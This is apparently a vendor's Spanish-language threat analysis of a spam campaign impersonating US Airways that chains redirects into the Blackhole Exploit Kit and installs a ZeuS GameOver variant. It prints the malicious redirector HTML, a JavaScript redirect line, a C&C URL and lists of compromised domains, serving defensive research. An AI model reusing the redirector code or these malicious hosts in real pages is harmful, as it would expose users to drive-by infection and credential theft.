Un regalo de ZeuS para los pasajeros de US Airways

Spam
El 20 de marzo detectamos una campaña de spam dirigida a los pasajeros de US Airways. Durante casi toda la semana, los cibercriminales enviaron este correo electrónico haciéndose pasar por la aerolínea:

Tiene una descripción breve del procedimiento de registro y un código de confirmación para hacer la reserva por Internet.

Los criminales dirigen sus ataques a los usuarios que podrían estar viajando en el vuelo que se menciona, tratando de convencerlos de que pulsen en el enlace “Online reservation details” para ver más información sobre su reserva.

Los diferentes correos tenían diferentes enlaces – por ejemplo, encontramos los siguientes dominios: sulichat.hu, prakash.clanteam.com, panvelkarrealtors.com.

Después de pulsar en el enlace, una serie de redirecciones hacen que el usuario aparezca en un dominio que contiene el Blackhole Exploit Kit.

BlackHole Exploit Kit: redirecciones e infecciones
Se utiliza un método de infección típico de BlackHole para infectar los ordenadores de los usuarios.
El primer puerto de llamadas después de pulsar en el enlace es una página con el siguiente código html:
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”http://boemelparty.be/<removed>/js.js”></script>
<script type=”text/javascript” src=”http://nhb.prosixsoftron.in/<removed>/js.js”></script>
<script type=”text/javascript” src=”http://sas.hg.pl/<removed>/js.js”></script>
<script type=”text/javascript” src=”http://www.vinhthanh.com.vn/<removed>/js.js”></script>
<script type=”text/javascript” src=”http://www.alpine-turkey.com/<removed>/js.js”></script>
<script type=”text/javascript” src=”http://www.thedugoutdawgs.com/<removed>/js.js”></script>
</html>

Como consecuencia, se cargan javascripts en el navegador del usuario desde diferentes dominios. Los javascripts contienen un solo comando, como: document.location=’http://indigocellular.com/‘. Esta orden redirige al usuario a una página que contiene otro javascript que está ofuscado.

El propósito de este javascript es insertar enlaces en el código html de la página para que después dirija al objeto con el exploit. Hasta ahora hemos detectado tres tipos de objetos: un archivo JAR, un archivo SWF y un documento PDF. Cada objeto explota una vulnerabilidad en su aplicación respectiva – Java, Flash Player o Adobe Reader – para ejecutar el código malicioso en el sistema atacado. Si se está utilizando una versión vulnerable de cualquiera de estas aplicaciones, la infección tiene éxito: se carga y ejecuta el ejecutable malicioso en el sistema del usuario.

Se cargan documentos JAR, SWF y PDF maliciosos desde diferentes dominios – por ejemplo indigocellular.com, browncellular.com, bronzecellular.com (información sobre los dominios) – con los nombres Qai.jar, field.swf, dea86.pdf, 11591.pdf.

Detectamos estos exploits como:
Exploit.Java.CVE-2011-3544.mz
Exploit.SWF.Agent.gd
Exploit.JS.Pdfka.fof

Después de explotar las vulnerabilidades, se descarga un archivo ejecutable desde los mismos dominios en los que se encontraban los exploits. Se puede descargar con diferentes nombres – about.exe y contacts.exe, entre otros – y, en esencia, es un descargador. Cuando se ejecuta el descargador, se conecta con su C&C en la URL “176.28.18.135/pony/gate.php” y descarga y ejecuta en el sistema del usuario otro programa malicioso, ZeuS/ZBot o, para ser más precisos, una modificación de ese troyano conocida como “GameOver”.
ZeuS se descarga de sitios hackeados como:
cinecolor.com.ar
bizsizanayasaolmaz.org
cyrpainting.cl
hellenic-antiaging-academy.gr
elektro-pfeffer.at
grupozear.es
sjasset.com

Polimorfismo

En todas las etapas de este ataque, cada objeto – dominios, enlaces a javascripts, archivos con exploits, el descargador y Zeus – a menudo se reemplazaba por otro nuevo. Los dominios se mantuvieron “vivos” por casi 12 horas, pero los ejemplares de ZeuS se reemplazaban más a menudo.

Durante los cortos periodos (un par de horas durante varios días) en los que estuve monitorizando los archivos que se estaban descargando, logré detectar 6 modificaciones del descargador y 3 modificaciones de Zeus.

Recapitulando: una modificación incluye todos los ejemplares que se detectan con el mismo veredicto, por lo tanto, la cantidad de programas detectados por lo general es mayor que la de los veredictos.
Veredictos del descargador:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Trojan-PSW.Win32.Fareit.oo
Trojan-PSW.Win32.Fareit.pb
Trojan.Win32.Jorik.Downloader.ams

Cantidad total de programas detectados con estos veredictos: 250.
Veredictos de ZeuS:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx

Cantidad total de programas detectados con estos veredictos: 127.

Como ya había mencionado, estos son sólo los veredictos que pude registrar. Sin duda hubo más modificaciones a lo largo de esta campaña de spam.

Identificadores de redes zombi
No sólo se cambiaba el “envoltorio” de ZeuS (empaquetador, anti-emulación), el programa malicioso en sí también se estaba volviendo a compilar. ZeuS contiene una cadena de caracteres de identificación de su botnet que está “hardcoded” y algunas direcciones IP a las que el programa malicioso trata de conectarse después de la infección. Esos datos también se modificaron con el tiempo. Según las cifras de los ejemplares detectados y analizados, podemos deducir que ZeuS se volvía a compilar cada dos empaquetamientos.

Tras haber analizado 48 versiones de diferentes modificaciones de Zeus que los cibercriminales usaron en este ataque, descubrí 19 identificadores únicos de botnets:

A diferencia del programa ZeuS convencional que por lo general contiene una sola URL para descargar el archivo de configuración, cada ejemplar de GameOver tiene 20 direcciones IP “hardcoded” con puertos. Habiendo infectado el ordenador de la víctima, GameOver intenta restablecer una conexión con aquellas direcciones para informar a la red zombi sobre sí misma, recoger información (por ejemplo mediante inyecciones web) y enviar los datos robados de la víctima.

De las 960 direcciones IP que se encontraban en los 48 ejemplares analizados, sólo 157 son únicas:

+Desplegar lista de direcciones IP

Geografía del ataque
Imagino que, durante ese tiempo, los correos spam con enlaces para confirmar las reservas del vuelo de US Airways no eran el único método utilizado para propagar ZeuS. Los criminales son muy originales. Y a pesar de que esta no es la primera vez que se utiliza un engaño con el tema de viajes, es la primera vez que se detecta este tipo de spam en particular. Si los destinatarios pertenecen al grupo de usuarios que los atacantes tienen como blanco, es mucho más probable que pulsen en el enlace del correo. Pero la mayoría de los usuarios que recibieron estos correos no viajaban a ningún lugar ese día, por lo que muy pocas personas cayeron en la trampa.
Por supuesto, por el periodo de prueba se enviaron otros correos spam con enlaces que dirigían a los mismos sitios, los mismos exploits y los mismos archivos ejecutables que mencionamos arriba. Me fijé en los lugares en los que nuestros usuarios detectaron las amenazas que estaban relacionadas a este ataque de una u otra forma. Abajo pueden ver una descripción geográfica de los exploits detectados, descargadores y modificaciones de Zeus que los cibercriminales utilizaron en este ataque:

P.D. Aquí hay algo de información sobre los dominios que se utilizan en la campaña de spam que describimos arriba(no es la primera vez que estos datos de registro se utilizan para registrar otros dominios que difunden programas maliciosos mediante spam):

A continuación hay una lista de hashes MD5 de ficheros
+Desplegar lista de MD5